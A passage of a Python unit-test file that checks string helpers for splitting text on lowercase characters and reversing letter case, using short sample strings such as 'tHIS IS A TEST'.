    assert string_split_on_lowercase(s) == ['FOO', 'AR', 'EST']

    s = 'tHIS IS A TEST'
    assert string_split_on_lowercase(s) == ['HIS IS A TEST']

    s = 'tHIS IS A tEST'
    assert string_split_on_lowercase(s) == ['HIS IS A ', 'EST']

    s = 'fOOBAr'
    assert string_split_on_lowercase(s) == ['OOBA']


def test_string_split_on_lowercase_2():
    s = 'FOObARtEST'
    assert string_split_on_lowercase(s, include_lowercase_characters=True) == ['FOO', 'bAR', 'tEST']

    s = 'tHIS IS A TEST'
    assert string_split_on_lowercase(s, include_lowercase_characters=True) == ['tHIS IS A TEST']

    s = 'tHIS IS A tEST'
    assert string_split_on_lowercase(s, include_lowercase_characters=True) == ['tHIS IS A ', 'tEST']

    s = 'fOOBAr'
    assert string_split_on_lowercase(s, include_lowercase_characters=True) == ['fOOBA', 'r']


def test_string_reverse_case_1():
    assert string_reverse_case('fooBarTest') == 'FOObARtEST'
    assert string_reverse_case('This is a test') == 'tHIS IS A TEST'
    assert string_reverse_case('This is a Test') == 'tHIS IS A tEST'
    assert string_reverse_case('FoobaR') == 'fOOBAr'
